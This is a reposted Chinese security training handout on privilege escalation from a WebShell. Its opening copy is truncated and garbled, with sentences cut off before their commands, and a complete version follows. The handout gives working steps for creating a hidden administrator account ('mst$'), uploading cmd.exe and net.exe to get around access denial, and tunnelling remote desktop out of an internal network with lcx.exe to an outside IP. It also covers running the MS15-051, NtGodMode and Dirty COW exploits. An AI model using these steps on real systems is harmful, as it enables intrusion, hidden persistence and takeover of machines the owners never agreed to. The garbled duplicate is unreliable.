米斯特白帽培训讲义 漏洞篇 提权
2017-04-11 15:10
435 查看
http://blog.csdn.net/wizardforcel/article/details/59523598
整理:飞龙
协议:CC BY-NC-SA 4.0
提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 guest,通过提权后就变成超级管理员,拥有了管理 Windows 的所有权限。提权是黑客的专业名词,一般用于网站入侵和系统入侵。本讲义所讲的是基于 WebShell 的菜刀管理下提权。
远程连接默认端口:3389。
下面拿菜刀中的 Shell 演示一遍这几个命令。
首先是
然后是
然后是
知道这些用户之后,我们需要创建自己的用户
接下来我们创建一个名为
可以看到它并没有显示在用户列表中,之后我们再执行
它又是确实存在的,这就是隐藏用户的一个小技巧。
之后我们把
现在我们查看远程连接的端口,首先执行
我们看到它的 PID 为 1504。之后执行
寻找 PID 为 1504 的一行,可以看到它的端口是 3389。
需要远程连接的时候,输入刚刚创建的用户名和密码就可以了。
那我们可以找到自己电脑上的
我们就可以执行
我们再来看各种命令:
可以看到突破了限制。
我们可以看到 WebShell 的主机处于内网下,内网的意思就是说,它能连接别人,但别人不能连接它,就跟连接路由器的个人电脑差不多。
那么这种情况下,我们就需要用到端口转发工具
将
然后我们在本机执行:
1
[/code]
这条命令的意思就是说,监听本机的 51 和 3388 端口,并将两个端口互相转发,端口 51 的入境流量发给端口 3388,反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口,为了避免与本机的远程连接服务冲突,选择了 3388。大家可以自行选择其他未占用端口。
然后我们在肉鸡上执行:
1
[/code]
这条命令连接肉鸡的 3389 端口,和本机的 51 端口,并互相转发。
之后,我们在本机或其他主机上使用远程连接客户端,连接
远程连接客户端的封包会发给主机的
等待一会儿之后,我们成功连接了
4000
肉鸡的远程桌面:
首先我们通过
我们可以看到它安装了
然后我们使用GetRoot Tools工具,打开它,主界面是这样的:
我们选中上面的 Windows 2003,然后把
这就是我们可以使用的 Exp。我们随便选择一个,比如
我们需要根据系统的版本来选择 Exp,这里系统是 32 位的,我们就应该选择
它的使用方法是
我们可以看到命令执行成功。
上传之后,执行
然后通过远程连接登录目标主机,将用户名输入为
可以进入目标主机。
注意,必须是输入已有用户名,不存在的用户名是不行的。
之后我们执行以下命令来编译:
1
[/code]
然后执行
Kali Linux 秘籍 第七章 权限提升
CVE-2016-5195 脏牛漏洞
米斯特白帽培训讲义 漏洞篇 提权
讲师:gh0stkey整理:飞龙
协议:CC BY-NC-SA 4.0
提权,顾名思义就是提高自己在服务器中的权限,就比如在 Windows 中你本身登录的用户是 guest,通过提权后就变成超级管理员,拥有了管理 Windows 的所有权限。提权是黑客的专业名词,一般用于网站入侵和系统入侵。本讲义所讲的是基于 WebShell 的菜刀管理下提权。
基本 Dos 命令、常识
whoami:查看当前用户名,用于查看权限大小。
ipconfig:显示当前 TCP/IP 配置,用于查看 IP。
net user:查看当前系统的所有用户。
net user <用户名> <用户密码> /add:创建用户。
net localgroup administrators <用户名> /add:将用户加入
administrators用户组。
远程连接默认端口:3389。
下面拿菜刀中的 Shell 演示一遍这几个命令。
首先是
whoami,可以看到
administrator,应该是管理员。
然后是
ipconfig,我们可以看到
192.168.175.129,这是内网的 IP。
然后是
net user:
知道这些用户之后,我们需要创建自己的用户
mst。创建后再执行
net user,可以看到创建成功:
接下来我们创建一个名为
mst$的用户:
可以看到它并没有显示在用户列表中,之后我们再执行
net user mst$:
它又是确实存在的,这就是隐藏用户的一个小技巧。
之后我们把
mst$添加到管理员组中,并且查看它的信息,我们发现它成功刚添加到了管理员组中。
现在我们查看远程连接的端口,首先执行
tasklist /svc,寻找
TermService:
我们看到它的 PID 为 1504。之后执行
netstat -ano:
寻找 PID 为 1504 的一行,可以看到它的端口是 3389。
需要远程连接的时候,输入刚刚创建的用户名和密码就可以了。
突破限制
假如说我们在实际情况中看到了[Err]拒绝访问:
那我们可以找到自己电脑上的
cmd.exe,然后上传上去。比如上传路径如下:
我们就可以执行
setp <路径>\cmd.exe:
我们再来看各种命令:
net user还是拒绝访问的,我们用老方法,找到自己电脑中的
net.exe,然后传上去。之后执行
<路径>\net.exe user:
可以看到突破了限制。
端口转发
在提权过程中,我们经常碰到这样的情况:我们可以看到 WebShell 的主机处于内网下,内网的意思就是说,它能连接别人,但别人不能连接它,就跟连接路由器的个人电脑差不多。
那么这种情况下,我们就需要用到端口转发工具
lcx.exe,除此之外,还需要一台拥有外网 IP 的主机。这里我们把内网的主机叫做肉鸡,独立 IP 主机叫做本机。
将
lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP 为
119.90.140.191:
然后我们在本机执行:
lcx.exe -listen 51 33881
1
[/code]
这条命令的意思就是说,监听本机的 51 和 3388 端口,并将两个端口互相转发,端口 51 的入境流量发给端口 3388,反之亦然。其中 51 是用于肉鸡连接的端口。3388 是用于我们的远程连接客户端连接的端口,为了避免与本机的远程连接服务冲突,选择了 3388。大家可以自行选择其他未占用端口。
然后我们在肉鸡上执行:
lcx.exe -slave 119.90.140.191 51 127.0.0.1 33891
1
[/code]
这条命令连接肉鸡的 3389 端口,和本机的 51 端口,并互相转发。
之后,我们在本机或其他主机上使用远程连接客户端,连接
119.90.140.191:3388,可以看到
lcx中显示了转发的信息。
远程连接客户端的封包会发给主机的
lcx,之后会发给肉鸡的
lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。
等待一会儿之后,我们成功连接了
4000
肉鸡的远程桌面:
Windows Exp 提权
Exp 提权用于普通方式不好用的时候。首先我们通过
systeminfo查看补丁:
我们可以看到它安装了
Q147222。
然后我们使用GetRoot Tools工具,打开它,主界面是这样的:
我们选中上面的 Windows 2003,然后把
[01]: Q147222复制到上方的输入框中。之后点击
Search:
这就是我们可以使用的 Exp。我们随便选择一个,比如
MS15-051。我们可以在课件中的 MS 提权集(
提权-扩大战果/扩大战果-提权之Exploit提权&上帝之门(Windows).zip -> ms提权集/ms15-051/ms15-051)中找到它。
我们需要根据系统的版本来选择 Exp,这里系统是 32 位的,我们就应该选择
Win32/32.exe。上传之后,我们可以使用
dir命令在目录中看到它:
它的使用方法是
<exp.exe> "<cmd 命令>",例如,我们执行
net user:
我们可以看到命令执行成功。
上帝之门
上帝之门 Exp 用于开启 Windows 的“上帝模式”,即任意账户无密码登录。它需要能上传并且执行 EXE 文件。使用方法为NtGodMode.exe [ON|OFF]。我们可以在课件中(
提权-扩大战果/扩大战果-提权之Exploit提权&上帝之门(Windows).zip -> NtGodMode.exe)找到它。
上传之后,执行
NtGodMode.exe ON:
然后通过远程连接登录目标主机,将用户名输入为
admin,密码任意填写。
可以进入目标主机。
注意,必须是输入已有用户名,不存在的用户名是不行的。
Linux Exp 提权
首先根据uname -a查看内核版本,之后根据内核版本找 Exp:
之后我们执行以下命令来编译:
gcc -pthread exp.c -o exp1
1
[/code]
然后执行
./exp来执行 Exp。我们一开始的用户可能是
xxx@yyy,执行之后就变成了
root@yyy,这样就算提权成功。
附录
米斯特白帽子培训第二期视频教程Kali Linux 秘籍 第七章 权限提升
CVE-2016-5195 脏牛漏洞
相关文章推荐
- 米斯特白帽培训讲义(v2)漏洞篇 提权
- 米斯特白帽培训讲义 漏洞篇 提权
- 米斯特白帽培训讲义(v2)漏洞篇 文件上传
- 米斯特白帽培训讲义 漏洞篇 CSRF
- 米斯特白帽培训讲义(v2)漏洞篇 文件上传
- 米斯特白帽培训讲义(v2)漏洞篇 第三方风险
- 米斯特白帽培训讲义 漏洞篇 文件包含
- 米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历
- 米斯特白帽培训讲义 漏洞篇 逻辑漏洞
- 米斯特白帽培训讲义 漏洞篇 代码执行
- 米斯特白帽培训讲义 漏洞篇 SQL 注入
- 米斯特白帽培训讲义(v2)漏洞篇 SSRF
- 米斯特白帽培训讲义(v2)漏洞篇 SQL 注入
- 米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
- 米斯特白帽培训讲义(v2)漏洞篇 文件包含
- 米斯特白帽培训讲义(v2)漏洞篇 文件包含
- 米斯特白帽培训讲义 漏洞篇 文件上传
- 米斯特白帽培训讲义(v2)实战篇 余闻同学录
- 米斯特白帽培训讲义 挖掘篇
- 米斯特白帽培训讲义 工具篇 AWVS